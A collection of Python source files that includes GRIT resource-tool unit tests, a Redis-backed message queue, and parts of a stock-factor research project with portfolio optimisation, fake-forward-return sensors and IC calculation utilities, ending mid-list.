const size_t %(map_name)sSize = arraysize(%(map_name)s);
''' % { 'map_name': GetMapName(item.GetRoot()) }
class SourceInclude(interface.ItemFormatter):
'''Populate the resource mapping. For each include, we map a string to
the resource ID.'''
def Format(self, item, lang='en', output_dir='.'):
return ' {"%s", %s},\n' % (item.attrs['name'], item.attrs['name'])
class SourceFileInclude(interface.ItemFormatter):
'''Populate the resource mapping. For each include, we map a filename to
the resource ID.'''
def Format(self, item, lang='en', output_dir='.'):
filename = item.attrs['file'].replace("\\", "/")
return ' {"%s", %s},\n' % (filename, item.attrs['name'])
```
#### File: grit/node/io_unittest.py
```python
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(sys.argv[0]), '../..'))
import os
import StringIO
import unittest
from grit.node import misc
from grit.node import io
from grit.node import empty
from grit import grd_reader
from grit import util
class FileNodeUnittest(unittest.TestCase):
def testGetPath(self):
root = misc.GritNode()
root.StartParsing(u'grit', None)
root.HandleAttribute(u'latest_public_release', u'0')
root.HandleAttribute(u'current_release', u'1')
root.HandleAttribute(u'base_dir', ur'..\resource')
translations = empty.TranslationsNode()
translations.StartParsing(u'translations', root)
root.AddChild(translations)
file_node = io.FileNode()
file_node.StartParsing(u'file', translations)
file_node.HandleAttribute(u'path', ur'flugel\kugel.pdf')
translations.AddChild(file_node)
root.EndParsing()
self.failUnless(file_node.GetFilePath() ==
util.normpath(
os.path.join(ur'../resource', ur'flugel/kugel.pdf')))
def VerifyCliquesContainEnglishAndFrenchAndNothingElse(self, cliques):
for clique in cliques:
self.failUnlessEquals(len(clique[0].clique), 2)
self.failUnless('en' in cliques[i][0].clique)
self.failUnless('fr' in cliques[i][0].clique)
def testLoadTranslations(self):
xml = '''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3" base_dir=".">
<translations>
<file path="generated_resources_fr.xtb" lang="fr" />
</translations>
<release seq="3">
<messages>
<message name="ID_HELLO">Hello!</message>
<message name="ID_HELLO_USER">Hello <ph name="USERNAME">%s<ex>Joi</ex></ph></message>
</messages>
</release>
</grit>'''
grd = grd_reader.Parse(StringIO.StringIO(xml),
util.PathFromRoot('grit/testdata'))
grd.SetOutputContext('en', {})
grd.RunGatherers(recursive=True)
self.VerifyCliquesContainEnglishAndFrenchAndNothingElse(grd.GetCliques())
def testIffyness(self):
grd = grd_reader.Parse(StringIO.StringIO('''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3" base_dir=".">
<translations>
<if expr="lang == 'fr'">
<file path="generated_resources_fr.xtb" lang="fr" />
</if>
</translations>
<release seq="3">
<messages>
<message name="ID_HELLO">Hello!</message>
<message name="ID_HELLO_USER">Hello <ph name="USERNAME">%s<ex>Joi</ex></ph></message>
</messages>
</release>
</grit>'''), util.PathFromRoot('grit/testdata'))
grd.SetOutputContext('en', {})
grd.RunGatherers(recursive=True)
grd.SetOutputContext('fr', {})
grd.RunGatherers(recursive=True)
def testConditionalLoadTranslations(self):
xml = '''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3"
base_dir=".">
<translations>
<if expr="True">
<file path="generated_resources_fr.xtb" lang="fr" />
</if>
<if expr="False">
<file path="no_such_file.xtb" lang="de" />
</if>
</translations>
<release seq="3">
<messages>
<message name="ID_HELLO">Hello!</message>
<message name="ID_HELLO_USER">Hello <ph name="USERNAME">%s<ex>
Joi</ex></ph></message>
</messages>
</release>
</grit>'''
grd = grd_reader.Parse(StringIO.StringIO(xml),
util.PathFromRoot('grit/testdata'))
grd.SetOutputContext('en', {})
grd.RunGatherers(recursive=True)
self.VerifyCliquesContainEnglishAndFrenchAndNothingElse(grd.GetCliques())
def testConditionalOutput(self):
xml = '''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3"
base_dir=".">
<outputs>
<output filename="resource.h" type="rc_header" />
<output filename="en/generated_resources.rc" type="rc_all"
lang="en" />
<if expr="pp_if('NOT_TRUE')">
<output filename="de/generated_resources.rc" type="rc_all"
lang="de" />
</if>
</outputs>
<release seq="3">
<messages>
<message name="ID_HELLO">Hello!</message>
</messages>
</release>
</grit>'''
grd = grd_reader.Parse(StringIO.StringIO(xml),
util.PathFromRoot('grit/test/data'))
grd.SetOutputContext('en', {})
grd.RunGatherers(recursive=True)
outputs = grd.GetChildrenOfType(io.OutputNode)
self.failUnless(outputs[0].SatisfiesOutputCondition())
self.failUnless(outputs[0].GetType() == 'rc_header')
self.failUnless(outputs[1].SatisfiesOutputCondition())
self.failUnless(outputs[1].GetType() == 'rc_all')
self.failUnless(not outputs[2].SatisfiesOutputCondition())
self.failUnless(outputs[2].GetType() ==
'output_condition_not_satisfied_rc_all')
if __name__ == '__main__':
unittest.main()
```
#### File: grit/tool/preprocess_unittest.py
```python
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(sys.argv[0]), '../..'))
import unittest
import grit.tool.preprocess_interface
from grit.tool import rc2grd
class PreProcessingUnittest(unittest.TestCase):
def testPreProcessing(self):
tool = rc2grd.Rc2Grd()
class DummyOpts(object):
verbose = False
extra_verbose = False
tool.o = DummyOpts()
tool.pre_process = 'grit.tool.preprocess_unittest.DummyPreProcessor'
result = tool.Process('', '.\resource.rc')
self.failUnless(
result.children[2].children[2].children[0].attrs['name'] == 'DUMMY_STRING_1')
class DummyPreProcessor(grit.tool.preprocess_interface.PreProcessor):
def Process(self, rctext, rcpath):
rctext = '''STRINGTABLE
BEGIN
DUMMY_STRING_1 "String 1"
// Some random description
DUMMY_STRING_2 "This text was added during preprocessing"
END
'''
return rctext
if __name__ == '__main__':
unittest.main()
```
#### File: grit/tool/toolbar_postprocess.py
```python
import sys
import re
import postprocess_interface
from grit import lazy_re
import grit.node.empty
from grit.node import misc
class ToolbarPostProcessor(postprocess_interface.PostProcessor):
''' Defines message groups within the grd file for each of the
IDS_COMMAND stuff.
'''
_IDS_COMMAND = lazy_re.compile(r'IDS_COMMAND_')
_GRAB_PARAMETERS = lazy_re.compile(
r'(IDS_COMMAND_[a-zA-Z0-9]+)_([a-zA-z0-9]+)')
def Process(self, rctext, rcpath, grdnode):
''' Processes the data in rctext and grdnode.
Args:
rctext: string containing the contents of the RC file being processed.
rcpath: the path used to access the file.
grdnode: the root node of the grd xml data generated by
the rc2grd tool.
Return:
The root node of the processed GRD tree.
'''
release = grdnode.children[2]
messages = release.children[2]
identifiers = grit.node.empty.IdentifiersNode()
identifiers.StartParsing('identifiers', release)
identifiers.EndParsing()
release.AddChild(identifiers)
#
# Turn the IDS_COMMAND messages into separate message groups
# with ids that are offsetted to the message group's first id
#
previous_name_attr = ''
previous_prefix = ''
previous_node = ''
new_messages_node = self.ConstructNewMessages(release)
for node in messages.children[:]:
name_attr = node.attrs['name']
if self._IDS_COMMAND.search(name_attr):
mo = self._GRAB_PARAMETERS.search(name_attr)
mp = self._GRAB_PARAMETERS.search(previous_name_attr)
if mo and mp:
prefix = mo.group(1)
previous_prefix = mp.group(1)
new_message_id = mp.group(2)
if prefix == previous_prefix:
messages.RemoveChild(previous_name_attr)
previous_node.attrs['offset'] = 'PCI_' + new_message_id
del previous_node.attrs['name']
new_messages_node.AddChild(previous_node)
else:
messages.RemoveChild(previous_name_attr)
previous_node.attrs['offset'] = 'PCI_' + new_message_id
del previous_node.attrs['name']
new_messages_node.AddChild(previous_node)
new_messages_node.attrs['first_id'] = previous_prefix
new_messages_node = self.ConstructNewMessages(release)
else:
if self._IDS_COMMAND.search(previous_name_attr):
messages.RemoveChild(previous_name_attr)
previous_prefix = mp.group(1)
new_message_id = mp.group(2)
previous_node.attrs['offset'] = 'PCI_' + new_message_id
del previous_node.attrs['name']
new_messages_node.AddChild(previous_node)
new_messages_node.attrs['first_id'] = previous_prefix
new_messages_node = self.ConstructNewMessages(release)
else:
if self._IDS_COMMAND.search(previous_name_attr):
messages.RemoveChild(previous_name_attr)
mp = self._GRAB_PARAMETERS.search(previous_name_attr)
previous_prefix = mp.group(1)
new_message_id = mp.group(2)
previous_node.attrs['offset'] = 'PCI_' + new_message_id
del previous_node.attrs['name']
new_messages_node.AddChild(previous_node)
new_messages_node.attrs['first_id'] = previous_prefix
new_messages_node = self.ConstructNewMessages(release)
previous_name_attr = name_attr
previous_node = node
self.AddIdentifiers(rctext, identifiers)
return grdnode
def ConstructNewMessages(self, parent):
new_node = grit.node.empty.MessagesNode()
new_node.StartParsing('messages', parent)
new_node.EndParsing()
parent.AddChild(new_node)
return new_node
def AddIdentifiers(self, rctext, node):
node.AddChild(misc.IdentifierNode.Construct(node, 'IDS_COMMAND_gcFirst', '12000', ''))
node.AddChild(misc.IdentifierNode.Construct(node,
'IDS_COMMAND_PCI_SPACE', '16', ''))
node.AddChild(misc.IdentifierNode.Construct(node, 'PCI_BUTTON', '0', ''))
node.AddChild(misc.IdentifierNode.Construct(node, 'PCI_MENU', '1', ''))
node.AddChild(misc.IdentifierNode.Construct(node, 'PCI_TIP', '2', ''))
node.AddChild(misc.IdentifierNode.Construct(node, 'PCI_OPTIONS_TEXT', '3', ''))
node.AddChild(misc.IdentifierNode.Construct(node, 'PCI_TIP_DISABLED', '4', ''))
node.AddChild(misc.IdentifierNode.Construct(node, 'PCI_TIP_MENU', '5', ''))
node.AddChild(misc.IdentifierNode.Construct(node, 'PCI_TIP_MENU_DISABLED', '6', ''))
node.AddChild(misc.IdentifierNode.Construct(node, 'PCI_TIP_OPTIONS', '7', ''))
node.AddChild(misc.IdentifierNode.Construct(node, 'PCI_TIP_OPTIONS_DISABLED', '8', ''))
node.AddChild(misc.IdentifierNode.Construct(node,
'PCI_TIP_DISABLED_BY_POLICY', '9', ''))
```
#### File: grit/grit/util_unittest.py
```python
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(sys.argv[0]), '..'))
import unittest
from grit import util
class UtilUnittest(unittest.TestCase):
''' Tests functions from util
'''
def testNewClassInstance(self):
# Test short class name with no fully qualified package name
# Should fail, it is not supported by the function now (as documented)
cls = util.NewClassInstance('grit.util.TestClassToLoad',
TestBaseClassToLoad)
self.failUnless(cls == None)
# Test non existent class name
cls = util.NewClassInstance('grit.util_unittest.NotExistingClass',
TestBaseClassToLoad)
self.failUnless(cls == None)
# Test valid class name and valid base class
cls = util.NewClassInstance('grit.util_unittest.TestClassToLoad',
TestBaseClassToLoad)
self.failUnless(isinstance(cls, TestBaseClassToLoad))
# Test valid class name with wrong hierarchy
cls = util.NewClassInstance('grit.util_unittest.TestClassNoBase',
TestBaseClassToLoad)
self.failUnless(cls == None)
def testCanonicalLanguage(self):
self.failUnless(util.CanonicalLanguage('en') == 'en')
self.failUnless(util.CanonicalLanguage('pt_br') == 'pt-BR')
self.failUnless(util.CanonicalLanguage('pt-br') == 'pt-BR')
self.failUnless(util.CanonicalLanguage('pt-BR') == 'pt-BR')
self.failUnless(util.CanonicalLanguage('pt/br') == 'pt-BR')
self.failUnless(util.CanonicalLanguage('pt/BR') == 'pt-BR')
self.failUnless(util.CanonicalLanguage('no_no_bokmal') == 'no-NO-BOKMAL')
def testUnescapeHtml(self):
self.failUnless(util.UnescapeHtml('ϲ') == unichr(1010))
self.failUnless(util.UnescapeHtml('ꯍ') == unichr(43981))
def testRelativePath(self):
""" Verify that MakeRelativePath works in some tricky cases."""
def TestRelativePathCombinations(base_path, other_path, expected_result):
""" Verify that the relative path function works for
the given paths regardless of whether or not they end with
a trailing slash."""
for path1 in [base_path, base_path + os.path.sep]:
for path2 in [other_path, other_path + os.path.sep]:
result = util.MakeRelativePath(path1, path2)
self.failUnless(result == expected_result)
# set-up variables
root_dir = 'c:%sa' % os.path.sep
result1 = '..%sabc' % os.path.sep
path1 = root_dir + 'bc'
result2 = 'bc'
path2 = '%s%s%s' % (root_dir, os.path.sep, result2)
# run the tests
TestRelativePathCombinations(root_dir, path1, result1)
TestRelativePathCombinations(root_dir, path2, result2)
class TestBaseClassToLoad(object):
pass
class TestClassToLoad(TestBaseClassToLoad):
pass
class TestClassNoBase(object):
pass
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jokaye/simple-message-queue",
"score": 3
} |
#### File: simple-message-queue/simple_message_queue/message_queue.py
```python
import json
# The queue prefix in redis key.
QUEUE_PREFIX = 'msg_u'
# Max messages count to limited per user.
MAX_QUEUE_SIZE = 1000
# Use singleton to make sure only one Queue instance in our system,
# and not abuse the redis connections.
class Singleton(type):
_instance = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instance:
cls._instance[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instance[cls]
class MessageQueue(object):
__metaclass__ = Singleton
def __init__(self, redis_ins):
self.queue_ins = redis_ins
def user_key(self, user_id):
return '%s_%s' % (QUEUE_PREFIX, user_id)
def get_messages(self, user_id, page_size):
data = self.queue_ins.lrange(self.user_key(user_id), 0, page_size - 1)
return [json.loads(d) for d in data]
def push_message(self, user_id, message):
"""
The step of push message to queue:
First: Push message to user message queue.
Second: Check the queue size has or not over limit max queue size,
otherwise trim the queue.
"""
self.queue_ins.rpush(self.user_key(user_id), json.dumps(message))
current_queue_size = self.queue_ins.llen(self.user_key)
over_size = current_queue_size - MAX_QUEUE_SIZE
if over_size > 0:
self.queue_ins.ltrim(self.user_key, over_size, -1)
return True
def ack_messages(self, user_id, last_position, msg_id):
"""
Through position and msg_id to check exactly position last messages return.
If the message is found, remove the before position messages as read.
"""
data = self.queue_ins.lrange(self.user_key(user_id), last_position - 1, last_position - 1)
if data:
message = json.loads(data[0])
if 'msg_id' in message and message['msg_id'] == msg_id:
self.queue_ins.ltrim(self.user_key(user_id), last_position, -1)
return True
return False
``` |
{
"source": "jokbull/benew_model",
"score": 2
} |
#### File: benew_model/flow/flow_optim_v1_forward_return.py
```python
from model.breakdown.Optimization.L1Norm.L1Norm import *
from collider.const import FACTOR_STYLE
from collider.sensor.get_factor_list import FactorList
from collider.utils.data_process import DataProcessing
from sensor.optimization_stock_weight_v2tc import OptimizationStockWeightV2tc
from sensor.get_fundamental_pool_v2 import GetFundamentalPool
from sensor.get_factor_data_v2 import GetFactorData
from sensor.fake_forward_return import FakeForwardReturn
from sensor.save_to_npy import SaveToBundleSensor
class flow_optim_v1_forward_return(L1Norm):
def initialize(self):
# self.user_context.update("pool_name", "pool_01")
self.user_context.update("alphaFactorDataFrame", FactorList(
file=self.user_context.alpha_file,
factor_style=FACTOR_STYLE.ALPHA
))
self.optim_options = {"options": {"show_progress": False},
"tc": 0.003,
"top": 500,
"risk_condition": {
"up": {
'style_size_2': 0.0005,
'style_beta_2': 0.0005,
'industry_商贸零售': 0.03,
'industry_石油石化': 0.03,
'industry_国防军工': 0.03,
'industry_传媒': 0.03,
'industry_餐饮旅游': 0.03,
'industry_汽车': 0.03,
'industry_电力及公用事业': 0.03,
'industry_电力设备': 0.03,
'industry_综合': 0.03,
'industry_计算机': 0.03,
'industry_医药': 0.03,
'industry_建材': 0.03,
'industry_农林牧渔': 0.03,
'industry_机械': 0.03,
'industry_纺织服装': 0.03,
'industry_保险Ⅱ': 0.03,
'industry_食品饮料': 0.03,
'industry_信托及其他': 0.03,
'industry_电子元器件': 0.03,
'industry_煤炭': 0.03,
'industry_建筑': 0.03,
'industry_银行': 0.03,
'industry_基础化工': 0.03,
'industry_证券Ⅱ': 0.03,
'industry_家电': 0.03,
'industry_交通运输': 0.03,
'industry_钢铁': 0.03,
'industry_有色金属': 0.03,
'industry_通信': 0.03,
'industry_轻工制造': 0.03,
'industry_房地产': 0.03
},
"down": {
'style_size_2': 0.0005,
'style_beta_2': 0.0005,
'industry_商贸零售': 0.03,
'industry_石油石化': 0.03,
'industry_国防军工': 0.03,
'industry_传媒': 0.03,
'industry_餐饮旅游': 0.03,
'industry_汽车': 0.03,
'industry_电力及公用事业': 0.03,
'industry_电力设备': 0.03,
'industry_综合': 0.03,
'industry_计算机': 0.03,
'industry_医药': 0.03,
'industry_建材': 0.03,
'industry_农林牧渔': 0.03,
'industry_机械': 0.03,
'industry_纺织服装': 0.03,
'industry_保险Ⅱ': 0.03,
'industry_食品饮料': 0.03,
'industry_信托及其他': 0.03,
'industry_电子元器件': 0.03,
'industry_煤炭': 0.03,
'industry_建筑': 0.03,
'industry_银行': 0.03,
'industry_基础化工': 0.03,
'industry_证券Ⅱ': 0.03,
'industry_家电': 0.03,
'industry_交通运输': 0.03,
'industry_钢铁': 0.03,
'industry_有色金属': 0.03,
'industry_通信': 0.03,
'industry_轻工制造': 0.03,
'industry_房地产': 0.03
}
}}
self.user_context.update("optim_options", {})
return super().initialize()
def _init_optim(self):
prediction_flow = self.user_context.flow_config.get("pred_flow_name", "prediction_stock")
optim_flow = self.user_context.flow_config.get("optim_flow_name", "optim_flow")
forward_return_flow = self.user_context.flow_config.get("forward_return_flow", "flow_forward_return")
self._optim_flow = SensorFlow(name=optim_flow, data_manager=self.user_context.DM)
# module 19. 昨日持仓
self._optim_flow.add_next_step(sensor=GetHolding,
args=["holding", [], {}],
kwds={"account": self.account})
self._optim_flow.add_next_step(sensor=GetDate,
args=["factor_as_of_date", [], {}],
kwds={'offset': 1}
)
# module 11. 确定对Alpha/Risk数据进行数据清洗的集合
self._optim_flow.add_next_step(sensor=GetFundamentalPool,
args=["stockCandidate",
[
f"{optim_flow}.holding.weight",
f"{optim_flow}.factor_as_of_date.date"
], {}],
kwds={"pool_name": self.user_context.ff_name,
"threshold": 0.3,
# "benchmark_weight": "weight_index_500"
},
silent=False)
factorList = {}
for k in self.user_context.alphaFactorDataFrame.factor_dataFrame.factor:
factorList[k + "_f1"] = FACTOR_STYLE.ALPHA
# module 7. 取alpha数据
self._optim_flow.add_next_step2(name="alphaPredData",
sensor=GetFactorData,
call=None,
input_var=[
f"{optim_flow}.factor_as_of_date.date"
],
kwds={"factorList": factorList})
# module 7. 取true_forward_return数据
self._optim_flow.add_next_step2(name="forwardReturnData",
sensor=GetFactorData,
call=None,
input_var=[
f"{optim_flow}.factor_as_of_date.date"
],
kwds={"factorList": {'forward_return_5_f1': FACTOR_STYLE.ALPHA}})
# 对true_forward_return加入噪声
self._optim_flow.add_next_step2(name="fakeForwardReturnData",
sensor=FakeForwardReturn, call=None,
input_var=[
f"{optim_flow}.forwardReturnData.exposure"
],
kwds={})
# module 8. 取fitted_forward_return(也是用到未来数据)
self._optim_flow.add_next_step2(name="fittedForwardReturnData",
sensor=GetFactorData,
call=None,
input_var=[
f"{optim_flow}.factor_as_of_date.date"
],
kwds={"factorList": {'flow_estimation_fitted_f1': FACTOR_STYLE.ALPHA}})
kwds = {}
kwds.update(self.optim_options)
kwds.update({'total_value': 10000000})
# kwds.update({'tc_b': 5})
# kwds.update({'tc_a': 0.5})
self._optim_flow.add_next_step(sensor=OptimizationStockWeightV2tc,
args=["optimizationStockWeight", [
"%s.fakeForwardReturnData.exposure" % optim_flow,
"%s.predictionFactorCovariance.factorCovariance" % prediction_flow,
"%s.alphaPredData.exposure" % optim_flow,
"%s.alphaPredData.factorName" % optim_flow,
"%s.riskFactorData.exposure" % forward_return_flow,
"%s.riskFactorData.factorName" % forward_return_flow,
"%s.stockCandidate.pool" % optim_flow,
"%s.holding.weight" % optim_flow,
"%s.factor_as_of_date.date" % optim_flow
], {
"%s.alphaPredData.exposure" % optim_flow: "alphaExposure",
"%s.alphaPredData.factorName" % optim_flow: "alphaName",
"%s.riskFactorData.exposure" % forward_return_flow: "riskExposure",
"%s.riskFactorData.factorName" % forward_return_flow: "riskName",
"%s.fakeForwardReturnData.exposure" % optim_flow: 'stockReturn'
}],
kwds=kwds,
silent=True)
self._optim_flow.add_next_step2(name="dumpTargetWeight",
sensor=DumpTargetWeight,
kwds={},
input_var=[f"{optim_flow}.optimizationStockWeight.targetWeight"]
)
```
#### File: jokbull/benew_model/run.py
```python
import click
import os
import codecs
import yaml
from collider import run_class
from collider.utils.logger import system_log
@click.command()
@click.option("-n", "--flow_name", default=None)
@click.option("-f", "--configure_file", default=None)
@click.help_option("-h", "--help")
def cli_run(**kwargs):
run(**kwargs)
def run(**kwargs):
flow_name = kwargs['flow_name']
config_file = kwargs['configure_file']
# if flow_name is None and config_file is None:
# raise AttributeError("Please input flow_name or configure_file")
"""
当指定了flow_name的时候,默认查找flow_name.yml作为配置,再用指定的文件做配置,否则报错。
当没有指定flow_name的时候,报错
"""
if flow_name is not None:
new_config_file = os.path.join("configure", "%s.yml" % flow_name)
if os.path.exists(new_config_file):
if config_file is not None:
system_log.warn("configure_file %s is override by %s" % (config_file, new_config_file))
config_file = new_config_file
elif not os.path.exists(config_file):
raise FileNotFoundError("%s or %s both not found" % (config_file, new_config_file))
else:
raise AttributeError("please input flow_name")
with codecs.open(config_file, encoding="utf-8") as f:
config = yaml.load(f)
if "fix_config" in kwargs:
config = kwargs["fix_config"](config)
m = __import__('flow.%s' % flow_name, fromlist=True)
flow = getattr(m, flow_name)
result = run_class(flow, config)
print(result)
if __name__ == '__main__':
# run(flow_name="flow_fake_forward_return", configure_file=None)
cli_run()
```
#### File: benew_model/sensor/fake_forward_return.py
```python
from collider.data.sensor import Sensor
from collider.data.message_package import MessagePackage
from scipy.stats import spearmanr
import numpy as np
class FakeForwardReturn(Sensor):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.lastvalue = None
@property
def output_variables(self):
return ["exposure", "factorName"]
def do(self, date, mp: MessagePackage, **kwargs):
scaler = kwargs.get("scaler", 0.5)
sigma = kwargs.get("sigma", 0.1)
shrinkage = kwargs.get("shrinkage", 0.2)
trueForwardReturn = mp.exposure
fakeForwardReturn = trueForwardReturn * scaler + np.random.normal(scale=sigma, size=4000)
if self.lastvalue is None:
thisvalue = fakeForwardReturn
else:
thisvalue = self.lastvalue * (1 - shrinkage) + fakeForwardReturn * shrinkage
self.lastvalue = thisvalue
self.logger.debug(spearmanr(trueForwardReturn, thisvalue, nan_policy="omit")[0])
return thisvalue, np.array(["fakeForwardReturn"])
```
#### File: benew_model/sensor/get_fundamental_pool_v2.py
```python
import numpy as np
from collider.data.data_manager import DataManager
from collider.data.message_package import MessagePackage
from collider.data.sensor import Sensor
class GetFundamentalPool(Sensor):
@property
def output_variables(self):
return ['pool']
def do(self, date: str, mp: MessagePackage, **kwargs) -> tuple:
as_of_date = mp.date
next_date = mp.data_manager.trading_dates.get_next_trading_date(as_of_date)
pool_name = kwargs["pool_name"]
quantile = kwargs.get("threshold", 0.5)
if quantile < 0 or quantile > 1:
raise ValueError("threshold should belong to [0, 1]")
pool_codes_dict = mp.data_manager.get_bar(
date=as_of_date,
columns=[pool_name, "pool_01"]
)
zscore = pool_codes_dict[pool_name]
pool_index = zscore >= np.nanpercentile(zscore, q=int(quantile * 100))
# 如果有基准,那么把基准的成分都加入pool
if "benchmark_weight" in kwargs:
benchmark = kwargs["benchmark_weight"]
benchmark_weight = mp.data_manager.get_bar(date=as_of_date, columns=[benchmark])[benchmark]
pool_index |= benchmark_weight > 0
# 如果存在当前持仓
if hasattr(mp, "weight"):
pool_index |= mp.weight > 0
# 去掉st股票
st = mp.data_manager.get_bar(date=next_date, columns=["is_st"])["is_st"]
is_st = st == 1
pool_index &= (~is_st)
pool_index &= pool_codes_dict["pool_01"] == 1
return pool_index,
```
#### File: benew_model/sensor/get_pool_v2.py
```python
from collider.data.sensor import Sensor
from collider.data.message_package import MessagePackage
class GetPool(Sensor):
@property
def output_variables(self):
return ["pool"]
def do(self, date, mp: MessagePackage, **kwargs):
pool_name = kwargs["pool_name"]
as_of_date = mp.date
next_date = mp.data_manager.trading_dates.get_next_trading_date(as_of_date)
pool_codes_dict = mp.data_manager.get_bar(
date=as_of_date,
columns=[pool_name]
)
pool_index = pool_codes_dict[pool_name] == 1
# 如果有基准,那么把基准的成分都加入pool
if "benchmark_weight" in kwargs:
benchmark = kwargs["benchmark_weight"]
benchmark_weight = mp.data_manager.get_bar(date=as_of_date, columns=[benchmark])[benchmark]
pool_index |= benchmark_weight > 0
# 如果存在当前持仓
if hasattr(mp, "weight"):
pool_index |= mp.weight > 0
# 去掉st股票, is_st比较特殊,可以认为可以取到第二天的
st = mp.data_manager.get_bar(date=next_date, columns=["is_st"])["is_st"]
is_st = st == 1
pool_index &= (~is_st)
# FIXME:blacklist
# if self.blacklist:
# blacklist = self.data.setdefault("blacklist", None)
# # 黑名单要取交易日的, 池子是用前一日的信息
# black_dict = self.data_source.get_bar(
# date=self.data_source.trading_dates.get_next_trading_date(input), columns=blacklist)
#
# for b in blacklist:
# np.bitwise_and(pool_index, black_dict[b] != 1, out=pool_index)
return pool_index,
```
#### File: benew_model/sensor/predict_factor_return_ARIMA.py
```python
import numpy as np
from collider.data.sensor import Sensor
from pmdarima.arima import auto_arima
class PredictFactorReturn_ARIMA(Sensor):
"""
用ARIMA模型对FactorReturn进行预测
"""
@property
def output_variables(self):
return ["factorReturn", "factorName", "arima"]
def do(self, date, mp, **kwargs):
rolling_window = kwargs.setdefault("rolling_window", 1)
arima_dict = {}
if mp.factorReturn.shape[0] >= rolling_window:
prediction_return = np.zeros(shape=len(mp.factorName))
for i, fac in enumerate(mp.factorName):
train = mp.factorReturn[(-rolling_window), i]
arima = auto_arima(train,
start_p=1, start_q=1, d=0,
max_p=5, max_d=2, max_q=5,
seasonal=False)
arima_dict[fac] = arima
prediction_return[i] = arima.predict(n_periods=kwargs.get("forward_period", 5))[-1]
else:
# 当数量不足时,返回nan
self.logger.warning("factor return history is not enough?")
prediction_return = np.full(mp.factorName.size, np.nan)
return prediction_return, mp.factorName, arima_dict
```
#### File: benew_model/util/calculate_factor_feature.py
```python
import numpy as np
from scipy.stats import spearmanr
from collider.data.base_data_source import BaseDataSource
from common.configure import read_configure
from collider.utils.logger import system_log
system_log.level_name = "INFO"
bundle_path = read_configure(name="test")['bundle_path']
DataSource = BaseDataSource()
DataSource.initialize(bundle_path)
td = DataSource.trading_dates
def load_data_from_npy(trade_date, factor_name):
return DataSource.get_bar(trade_date, [factor_name])[factor_name]
def calculate_factor_feature(factors, forward_return_name, pool_name, dates, func, **kwargs) -> np.ndarray:
if isinstance(dates, list) or isinstance(dates, np.ndarray):
# rawIC = np.array([calculate_IC(factors, forward_return_name, pool_name, date) for date in dates])
rawIC = np.array(
[calculate_factor_feature(factors, forward_return_name, pool_name, date, func, **kwargs) for date in dates])
return rawIC
else:
pool = load_data_from_npy(dates, pool_name) == 1
forward_return = load_data_from_npy(dates, forward_return_name)
rawIC = np.array([func(load_data_from_npy(dates, f), forward_return, pool, **kwargs) for f in factors])
return rawIC
def calculate_IC(a, b, pool, **kwargs):
try:
direction = kwargs.get("direction", 1)
factor_topRt = kwargs.get("factor_topRt", 1.0)
total_cnt = np.sum(pool)
v = direction * a
v[~pool] = np.nan
topN = np.ceil(total_cnt * factor_topRt).astype(int)
v[np.argsort(-v)[topN:]] = np.nan
return spearmanr(v[pool], b[pool], nan_policy="omit")[0]
except Exception as e:
print(e)
import statsmodels.api as sm
def calculate_factor_return(a, b, pool, **kwargs):
direction = kwargs.get("direction", 1)
model = sm.OLS(b[pool], direction * a[pool], hasconst=False, missing="drop")
result = model.fit() # method = "qr"
return result.params[0]
def calculate_tvalue(a, b, pool, **kwargs):
direction = kwargs.get("direction", 1)
model = sm.OLS(b[pool], direction * a[pool], hasconst=False, missing="drop")
result = model.fit() # method = "qr"
return result.tvalues[0]
def calculate_autocorrelation(factor_name, date, pool, **kwargs):
today_data = load_data_from_npy(date, factor_name)
yesterday_data = load_data_from_npy(td.get_previous_trading_date(date), factor_name)
return calculate_IC(today_data, yesterday_data, pool, **kwargs)
def calculate_factor_autocorrelation(factors, dates, pool_name, **kwargs):
if isinstance(dates, list) or isinstance(dates, np.ndarray):
result = np.array([calculate_factor_autocorrelation(factors, date, pool_name, **kwargs) for date in dates])
return result
else:
pool = load_data_from_npy(dates, pool_name) == 1
rawIC = np.array([calculate_autocorrelation(f, dates, pool, **kwargs) for f in factors])
return rawIC
def calculate_hithot(a, b, pool, **kwargs):
# factor_topN = kwargs.get("factor_topN", 500)
# ret_topN = kwargs.get("ret_topN", 1000)
factor_topRt = kwargs.get("factor_topRt", 0.2)
ret_topRt = kwargs.get("ret_topRt", 0.3)
# a 是因子值,b是forward_return
ret = np.where(pool, b, np.nan)
v = np.where(pool, a, np.nan)
total_cnt = np.sum(pool)
# 根据 比例(传入参数),计算factor 和 ret 覆盖股票数目
ret_topN = np.ceil(total_cnt * ret_topRt).astype(int)
factor_topN = np.ceil(total_cnt * factor_topRt).astype(int)
code_a = np.argsort(-ret)[:ret_topN]
code_b = np.argsort(-v)[:factor_topN]
intersec = set(code_a).intersection(set(code_b))
ratio = len(intersec) * 1.0 / len(code_b)
return ratio
def calculate_topret(a, b, pool, **kwargs):
factor_topRt = kwargs.get("factor_topRt", 0.2)
# a 是因子值,b是forward_return
ret = np.where(pool, b, np.nan)
v = np.where(pool, a, np.nan)
total_cnt = np.sum(pool)
factor_topN = np.ceil(total_cnt * factor_topRt).astype(int)
weight = np.ones(factor_topN)
weight /= np.nansum(weight)
code_index = np.argsort(-v)[:factor_topN]
return np.nansum(ret[code_index] * weight)
if __name__ == "__main__":
start_date = "20100101"
end_date = "20190101"
factors = [
# 'benew_p5_ma10_hist_tvalue_p06_20180531_t7_0606221539248_after_f1',
# 'benew_p5_ma10_0322001055_after_f1',
# 'benew_p5_ma20_0326083326_after_f1',
# 'benew_p05_noma_tvalue_20150601_0816225040769_after_f1',
# 'benew_p06_noma_tvalue_20180901_tp_0935_1000_0922191517773_after_f1',
# 'benew_p06_noma_tvalue_20180901_tp_0935_1000_0922221054686_after_f1',
# 'benew_p02_noma_tvalue_20180901_tp_0935_1000_0920194834095_after_f1',
